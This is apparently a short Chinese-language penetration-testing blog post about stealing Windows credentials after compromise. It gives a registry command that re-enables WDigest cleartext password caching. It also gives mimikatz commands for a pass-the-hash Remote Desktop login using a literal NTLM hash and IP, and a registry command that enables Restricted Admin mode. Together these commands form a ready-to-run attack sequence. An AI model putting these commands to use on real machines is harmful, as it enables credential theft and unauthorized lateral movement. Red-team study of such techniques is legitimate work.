? ? ? ?在之前的文章中[后渗透之搞定RDP简析]介绍了关于Windows Server 2012之后的版本不存储明文密码。
? ? ? ? 但是依旧可以通过修改注册表和mimikatz来达到获取密文密码的目的
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
?
? ? ? ?根据上述的方法确实可以获取到目标主机的密码并且成功登录到主机,但这个操作的风险其实是很高的,在本人测试的时候成功关了客户一台主机并且挤掉了业务系统的开发人员,所以该操作的风险太高,就算是最大权限的渗透执行这类操作也极易被发现。
? ? ? ?微软为了防止在Windows Server 2012R2之后的版本被攻击者在系统内存中抓取明文密码,使用了安全措施,但是该安全措施却造成了RDP的pth攻击。详细内容可以参考这边文章[远程桌面服务:启用受限管理模式],在获取到系统用户hash后,利用工具进行登录远程桌面,需要在mimikatz执行如下命令
privilege::debug
sekurlsa::pth /user:administrator /domain:192.168.163.109?/ntlm:79a7d376cba88ef8bb072042b0d6e0eb?"/run:mstsc.exe /restrictedadmin"
?
如果目标机器没有开启Restricted Admin mode,可以使用以下命令开启。
REG ADD HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f?
本次使用的mimikatz是从GitHub上下载的2.2.0,本人自带的2.1.0尝试了3小时也没有成功。